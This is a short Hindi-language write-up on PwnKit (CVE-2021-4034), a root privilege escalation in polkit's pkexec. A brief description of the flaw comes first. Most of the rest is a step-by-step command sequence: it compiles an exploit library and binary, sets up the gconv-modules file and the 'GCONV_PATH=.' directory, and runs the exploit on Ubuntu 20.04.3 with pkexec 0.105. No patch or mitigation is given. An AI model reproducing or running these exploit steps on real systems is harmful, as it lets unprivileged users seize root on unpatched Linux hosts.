
PwnKit - polkit के pkexec में खोजी गई स्थानीय विशेषाधिकार वृद्धि भेद्यता (CVE-2021-4034)
Qualys Research Team ने polkit के pkexec में एक मेमोरी भ्रष्टाचार भेद्यता की खोज की है, जो एक SUID-root प्रोग्राम है जो हर प्रमुख Linux वितरण पर डिफ़ॉल्ट रूप से स्थापित होता है। यह आसानी से शोषित होने वाली भेद्यता किसी भी अविशेषाधिकार प्राप्त उपयोगकर्ता को अपने डिफ़ॉल्ट कॉन्फ़िगरेशन में इस भेद्यता का शोषण करके एक कमजोर होस्ट पर पूर्ण root विशेषाधिकार प्राप्त करने की अनुमति देती है।
PwnKit: polkit के pkexec में खोजी गई स्थानीय विशेषाधिकार वृद्धि भेद्यता (CVE-2021-4034)
Ubuntu 20.04.3 LTS x86_64
pkexec संस्करण 0.105
mkdir /tmp/pwnkit_lpe/
gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c
gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit
echo "module UTF-8// PWNKIT// pwnkit 1" > /tmp/pwnkit_lpe/gconv-modules
mkdir -p "/tmp/pwnkit_lpe/GCONV_PATH=."
cp /usr/bin/true "/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:."
cd /tmp/pwnkit_lpe/
./pwnkit